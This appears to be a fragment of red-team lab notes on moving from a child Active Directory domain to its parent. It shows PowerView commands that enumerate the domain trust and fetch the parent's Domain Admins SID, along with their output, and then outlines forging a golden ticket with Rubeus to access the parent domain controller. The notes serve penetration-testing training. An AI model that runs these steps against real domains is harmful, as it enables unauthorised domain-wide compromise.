Parent / Child
powershell Get-DomainTrust
SourceName : dev.cyberbotic.io
TargetName : cyberbotic.io
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : BidirectionalGet SID of target group in parent Domain
powershell Get-DomainGroup -Identity "Domain Admins" -Domain cyberbotic.io -Properties ObjectSid
S-1-5-21-2594061375-675613155-814674916-512Find domain admin to impersonate
Create golden ticket: Rubeus attacker machine
Then import it into a logon session and use it to access the domain controller in the parent
Diamond Ticket
Last updated